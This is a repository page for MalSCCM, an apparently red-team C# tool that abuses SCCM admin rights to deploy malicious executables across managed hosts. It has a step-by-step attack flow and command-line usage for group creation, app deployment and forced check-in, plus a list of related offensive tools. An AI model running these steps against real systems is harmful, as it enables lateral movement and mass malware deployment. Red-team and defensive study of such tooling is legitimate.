• Stars
    star
    241
  • Rank 167,578 (Top 4 %)
  • Language
    C#
  • Created over 2 years ago
  • Updated about 1 year ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

MalSCCM

This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage. To use this tool your current process must have admin rights over the SCCM server.

Typically deployments of SCCM will either have the management server and the primary server on the same host, in which case the host returned from the locate command can be used as the primary server.

If that is not the case you will need to compromise the management host returned with locate so that you can then run locate again on that host and get the primary server hostname. Once you have that and admin access you are good to go!

Blog

For more information on usage of the tool, refer to the blog below.

Credits

Massive credit to PowerSCCM (https://github.com/PowerShellMafia/PowerSCCM) which this is all based off, this would not have been done without the work of @harmj0y, @jaredcatkinson, @enigma0x3, @mattifestation.

Attack Flow

  • Compromise client, use locate to find management server
  • Compromise management server, use locate to find primary server
  • use Inspect on primary server to view who you can target
  • Create a new device group for the machines you want to laterally move too
  • Add your targets into the new group
  • Create an application pointing to a malicious EXE on a world readable share
  • Deploy the application to the target group
  • Force the target group to checkin for updates
  • Profit...
  • Cleanup the application and deployment
  • Delete the group

Help menu

Commands listed below have optional parameters in <>. 

Attempt to find the SCCM management and primary servers:
    MalSCCM.exe locate

Inspect the primary server to gather SCCM information:
    MalSCCM.exe inspect </server:PrimarySiteHostname> </all /computers /deployments /groups /applications /forest /packages /primaryusers>

Create/Modify/Delete Groups to add targets in for deploying malicious apps. Groups can either be for devices or users:
    MalSCCM.exe group /create /groupname:example /grouptype:[user|device] </server:PrimarySiteHostname>
    MalSCCM.exe group /delete /groupname:example </server:PrimarySiteHostname>
    MalSCCM.exe group /addhost /groupname:example /host:examplehost </server:PrimarySiteHostname>
    MalSCCM.exe group /adduser /groupname:example /user:exampleuser </server:PrimarySiteHostname>

Create/Deploy/Delete malicious applications:
    MalSCCM.exe app /create /name:appname /uncpath:""\\unc\path"" </server:PrimarySiteHostname>
    MalSCCM.exe app /delete /name:appname </server:PrimarySiteHostname>
    MalSCCM.exe app /deploy /name:appname /groupname:example /assignmentname:example2 </server:PrimarySiteHostname>
    MalSCCM.exe app /deletedeploy /name:appname </server:PrimarySiteHostname>
    MalSCCM.exe app /cleanup /name:appname </server:PrimarySiteHostname>

Force devices of a group to checkin within a couple minutes:
    MalSCCM.exe checkin /groupname:example </server:PrimarySiteHostname>

More Repositories

1

PoshC2

A proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.
PowerShell
1,767
star
2

xss_payloads

Exploitation for XSS
PHP
697
star
3

PoshC2_Old

Powershell C2 Server and Implants
PowerShell
574
star
4

SharpSocks

Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell
C#
472
star
5

SharpWSUS

C#
429
star
6

RunPE

C# Reflective loader for unmanaged binaries.
C#
416
star
7

SimplePELoader

In-Memory PE Loader
C++
366
star
8

Prowl

Python
275
star
9

ETWHash

C# POC to extract NetNTLMv1/v2 hashes from ETW provider
C#
248
star
10

scrounger

Mobile application testing toolkit
Python
237
star
11

ShellcodeMutator

Python
232
star
12

Aladdin

C#
212
star
13

Tartarus-TpAllocInject

C++
172
star
14

RunOF

C#
138
star
15

Invoke-PowerThIEf

The PowerThIEf, an Internet Explorer Post Exploitation library
PowerShell
130
star
16

DLLInjection

DLL Injection Library & Tools
C++
70
star
17

SharpConflux

C#
63
star
18

zeropress

A dumb script for finding dumb coding errors in WordPress plugins
Python
55
star
19

CVE-2024-20356

This is a proof of concept for CVE-2024-20356, a Command Injection vulnerability in Cisco's CIMC.
Python
47
star
20

CVE-2024-25153

Proof-of-concept exploit for CVE-2024-25153.
Python
43
star
21

defensive-scripts

Defence Against the Dark Arts
34
star
22

InlineFunctionHooking

Windows Inline function hooking library targeted at MSVC
C
28
star
23

pwnlyoffice

Exploit ONLYOFFICE Implementations
JavaScript
24
star
24

PoshC2_IOCs

A list of IOCs applicable to PoshC2
YARA
23
star
25

SyscallsExtractor

C#
23
star
26

logparser

SQL scripts for querying event logs
21
star
27

yasha

Python
18
star
28

metasploit-modules

Modules created by Nettitude for Metasploit
Ruby
12
star
29

hyperv-driver-thread-detection-poc

hyperv-driver-thread-detection-poc
C#
11
star
30

PoshC2_Shellcode

Supporting projects for PoshC2
C
11
star
31

CVE-2022-23253-PoC

CVE-2022-23253 PoC
Python
5
star
32

PoshC2_Linux_Implant

C
4
star
33

PBind

PBind payloads for PoshC2
C#
2
star
34

secure-development-training

PHP
2
star
35

PoshC2_Core

C#
1
star
36

FComm

FComm payloads for PoshC2
C#
1
star